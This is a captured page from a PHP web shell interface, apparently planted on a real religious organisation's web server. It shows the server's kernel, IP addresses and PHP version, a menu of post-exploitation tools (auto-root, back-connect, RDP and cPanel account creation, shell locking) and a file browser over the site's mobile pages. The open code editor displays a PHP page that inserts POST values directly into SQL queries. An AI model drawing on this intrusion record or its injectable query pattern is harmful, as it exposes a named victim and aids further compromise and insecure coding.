Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
mobile /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
flowplayer
[ DIR ]
drwxr-xr-x
mobilecommon
[ DIR ]
drwxr-xr-x
mobileimages
[ DIR ]
drwxr-xr-x
mobilejs
[ DIR ]
drwxr-xr-x
mp3player
[ DIR ]
drwxr-xr-x
appsgames.html
3.17
KB
-rw-r--r--
appsgames.php
4.16
KB
-rw-r--r--
comingevent.html
3.17
KB
-rw-r--r--
comingevent.php
7.6
KB
-rw-r--r--
comingevent_25-10-13.php
6.82
KB
-rw-r--r--
comingeventdetail.php
9.29
KB
-rw-r--r--
currentnewsdetail.php
8.17
KB
-rw-r--r--
disclaimer.html
3.17
KB
-rw-r--r--
disclaimer.php
2.79
KB
-rw-r--r--
downloadrigtone.php
228
B
-rw-r--r--
error_log
38.02
MB
-rw-r--r--
flowplayer.swf
4.05
KB
-rw-r--r--
index.php
7.84
KB
-rw-r--r--
index_25-10-13.php
6.67
KB
-rw-r--r--
index_29-10-12.html
3.17
KB
-rw-r--r--
index_31_oct.php
7.12
KB
-rw-r--r--
index_old.html
348
B
-rw-r--r--
policy.html
3.17
KB
-rw-r--r--
policy.php
2.79
KB
-rw-r--r--
ringtones.html
3.17
KB
-rw-r--r--
ringtones.php
4.7
KB
-rw-r--r--
ringtones_ds.php
3.89
KB
-rw-r--r--
ringtones_ds1.php
4.12
KB
-rw-r--r--
terms.html
3.18
KB
-rw-r--r--
terms.php
2.79
KB
-rw-r--r--
todaysevent.html
3.17
KB
-rw-r--r--
todaysevent.php
7.64
KB
-rw-r--r--
todaysevent_25-10-13.php
6.9
KB
-rw-r--r--
todayseventdetail.php
9.77
KB
-rw-r--r--
todayseventdetail_25-10-13.php
9.05
KB
-rw-r--r--
videos.html
3.17
KB
-rw-r--r--
videos.php
4.25
KB
-rw-r--r--
videosdetail.php
4.41
KB
-rw-r--r--
wallpapers.html
3.17
KB
-rw-r--r--
wallpapers.php
3.67
KB
-rw-r--r--
wallpapers_29-10-12.php
3.94
KB
-rw-r--r--
wallpapers_ds.php
3.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comingeventdetail.php
<?php session_start(); ?> <!DOCTYPE html> <html> <head> <title>Aryasamaj</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="css/mobile.css" type="text/css" /> <script type="text/javascript" src="mobilejs/common.js"></script> <script src="http://maps.google.com/maps/api/js?sensor=false"></script> </head> <body> <div class="wrapper" data-role="page"><!-- wrapper start --> <div class="inner_wrapper"><!-- inner_wrapper start --> <div class="header"><!-- header start --> <div class="logo"> <a href="index.php"><img src="mobileimages/logo.png" alt="International Arya Mahasammelan 2012" /></a> </div> <h3>The Aryasamaj</h3> <div class="clr"></div> </div><!-- header end --> <div class="menu"><!-- menu start --> <ul> <li><a href="index.php" data-transition="slide" >Current News</a></li> <li class="active"><a href="comingevent.php">Coming Events</a></li> <li><a href="todaysevent.php">Today's Events</a></li> <li><a href="wallpapers.php">Wallpapers</a></li> <li><a href="ringtones.php">Ringtones</a></li> <li><a href="videos.php">Videos</a></li> <li><a href="appsgames.php">Apps & Games</a></li> <div class="clr"></div> </ul> </div><!-- menu end --> <div class="clr"></div> <?php //created by dharmishtha include("mobilecommon/aryasamaj-clientconnection.php"); if($_POST["eventid"] > 0) { $_SESSION['eventid']=$_POST["eventid"]; $evtid=$_POST["eventid"]; } else { $evtid=$_SESSION['eventid']; } if($_POST["eventpage"]!="") { $_SESSION['eventpage']=$_POST["eventpage"]; $urlvalue=$_POST["eventpage"]; } else { $urlvalue=$_SESSION['eventpage']; } ?> <div class="content"><!-- content start --> <?php if(isset($_POST["btnNext"])) // Condition for the Next nd Previous Functionality create by vimal - 15-oct-12 { if($_POST["nextEventsId"] > 0) { $selqry="SELECT * FROM arya_event WHERE event_id='".$_POST["nextEventsId"]."'"; } } else if($_POST["prevEventsId"] > 0) { $selqry="SELECT * FROM arya_event WHERE event_id='".$_POST["prevEventsId"]."'"; } // End else { $selqry = "select * from arya_event where event_id='".$evtid."'"; } //$current = date("Y/m/d"); $qryres = mysql_query($selqry); $fetval=mysql_fetch_array($qryres); $entid=$fetval['event_id']; $ecatid=$fetval['ecat_id']; $instid=$fetval['inst_id']; $InstLevalid=getFieldValue("inst_typelevel","arya_institution","inst_id='".$instid."'"); $entshort=stripslashes($fetval['event_shorttext']); $entcontent=stripslashes($fetval['event_content']); $entcity=$fetval['city_id']; $entcityName=stripslashes(getFieldValue('city_name','arya_city','city_id="'.$entcity.'"')); $enttitle=stripslashes($fetval['event_title']); $entimage=$fetval['event_image']; $entstartdate=date("d-M-Y",strtotime($fetval['event_startdate'])); $entenddate=date("d-M-Y",strtotime($fetval['event_enddate'])); $endDateTimeStamp = $fetval['event_enddate']; $entendtime=stripslashes($fetval["event_endtime"]); $entstarttime=stripslashes($fetval["event_starttime"]); $eventCatName= stripslashes(getFieldValue("ecat_name","arya_ecategory","ecat_id='".$ecatid."'")); $entaddress=stripslashes($fetval['event_address']); $instname=stripslashes(getFieldValue('inst_name','arya_institution','inst_id="'.$instid.'"')); $latitude = $fetval['event_latitude']; $longtitude = $fetval['event_longtitude']; $qrySelnext= "select * from arya_event where event_enddate >'".$endDateTimeStamp."'"; $qSelnext = mysql_query($qrySelnext); $fetchnext = mysql_fetch_array($qSelnext); $nextID = $fetchnext["event_id"]; $nextEndDate = $fetchnext["event_enddate"]; $qrySelpriveous= "select * from arya_event where event_enddate <'".$endDateTimeStamp."'"; $qSelpriveous = mysql_query($qrySelpriveous); $fetchpriveous = mysql_fetch_array($qSelpriveous); $PrevEndDate = $fetchpriveous["event_enddate"]; $PrevID = $fetchpriveous["event_id"]; ?> <div class="inner_con"><!--inner_con start--> <h2><?php echo $enttitle; ?></h2> <div class="detail_left"><!--detail_left end--> <div class="event_detail"><!--event_detail start--> <div class="big_img"><!--img_div start--> <img src="http://www.thearyasamaj.com/aryaadmin/images/eventphoto/<?php echo $entimage;?>" width="100%" alt="" title="" /> </div><!--img_div end--> <div class="detail_div"><!--cont_div start--> <p> <?php if($entstartdate==$entenddate) { echo $entstartdate; } else { echo $entstartdate; ?> to <?php echo $entenddate; } ?> <br /> <?php echo $entstarttime; ?> to <?php echo $entendtime; ?> <br /> <?php echo $entaddress; ?> <br /> <span class="name"><?php echo $instname; ?> </span> <br /> </p> </div><!--cont_div end--> <?php if($latitude != "" && $longtitude != "") { ?> <?php }//map condition over ?> <div class="clr"></div> </div><!--event_detail end--> <div class="detail_text"><!--detail_text start--> <p><?php echo $entshort; ?></p> <p><?php echo $entcontent; ?></p> <form name="frmNextPrev" action="" method="post"> <!-- Next-Previous FUnctionality start - create by vimal on 15-oct-12 --> <div align="left"> <?php if($PrevEndDate > 0) { $EventsID = $PrevID; ?> <div class="back_btn"> <input type="submit" name="btnPrev" value="Previous" class="back_right" /> <input type="hidden" name="prevEventsId" value="<?php echo $EventsID; ?>" /> </div> <?php } ?> <?php if($nextEndDate > 0) { $EventsID = $nextID; ?> <div class="back_btn"> <input type="submit" name="btnNext" value="Next" class="back_right"/> <input type="hidden" name="nextEventsId" value="<?php echo $EventsID; ?>" /> </div> <div class="clr"></div> <?php } ?> </div> </form> <!-- End --> </div><!--detail_text end--> </div><!--detail_left end--> <div class="map"> <div id="map_holder" style="height:250px; width:100%"></div> <script language="javascript"> DisplayBigMap(a="<?php echo $latitude; ?>",b="<?php echo $longtitude; ?>",'map_holder'); function DisplayBigMap(a,b,getById,W,H) { geocoder = new google.maps.Geocoder(); latlon=new google.maps.LatLng(a, b) mapholder=document.getElementById(''+getById+'') mapholder.style.height=""+H+""; mapholder.style.width=""+W+""; var myOptions={ center:latlon, zoom:13, mapTypeId:google.maps.MapTypeId.ROADMAP, streetViewControl: true, navigationControl: true, mapTypeControl: true, scaleControl: true, draggable:true, navigationControlOptions:{style:google.maps.NavigationControlStyle.SMALL} }; var map=new google.maps.Map(document.getElementById(''+getById+''),myOptions); var marker=new google.maps.Marker({position:latlon,map:map,title:"User are here!",icon: 'http://maps.google.com/mapfiles/ms/micons/red-dot.png'}); }//function over </script> </div> <div class="clr"></div> <div class="clr"></div> </div><!--inner_con start--> <div class="clr"></div> <?php // include('aryasamaj-bottompart.php')?> </div> <!--main part end--> <?php // include('aryasamaj-rightpart.php'); mysql_close($sqlconn);?> <div class="clr"></div> </div> </div><!-- content end --> <div class="footer"><!-- footer start --> <div> <div class="social_icons"><!-- social_icons start --> <div class="soc_link"> <a href="http://www.twitter.com/thearyasamaj" target="_blank" ><img src="mobileimages/twitter.png" alt="Click here to visit our twitter page" title="Click here to visit our twitter page" /></a> <a href="http://www.facebook.com/arya.samaj" target="_blank"><img src="mobileimages/facebook.png" alt="Click here to visit our facebook page" title="Click here to visit our facebook page" /></a> </div> <div class="gww"><a href="#">Powered by</a> <a href="http://www.jbm-group.com" target="_blank"><img src="../images/jbmlogo.png" alt="JBM Group" width="46" height="14" align="absbottom" title="JBM Group" /></a></div> <div class="fb_like" > <iframe src="https://www.facebook.com/plugins/like.php?href=http://www.facebook.com/arya.samaj" scrolling="no" frameborder="0" style="border:none; float:left; width:100%; height:24px; margin:-10px 0 0 0;"> </iframe> </div> <div class="clr"></div> </div><!-- social_icons end --> </div> <div class="btm_link"><!-- btm_link start --> <div class="con_link"> <a href="disclaimer.php" >Disclaimer</a> | <a href="policy.php">Privacy Poicy </a> | <a href="terms.php">Terms & Condiitons</a> </div> </div><!-- btm_link end --> </div><!-- footer end --> </div><!-- inner_wrapper end --> </div><!-- wrapper end --> </body> </html>
Close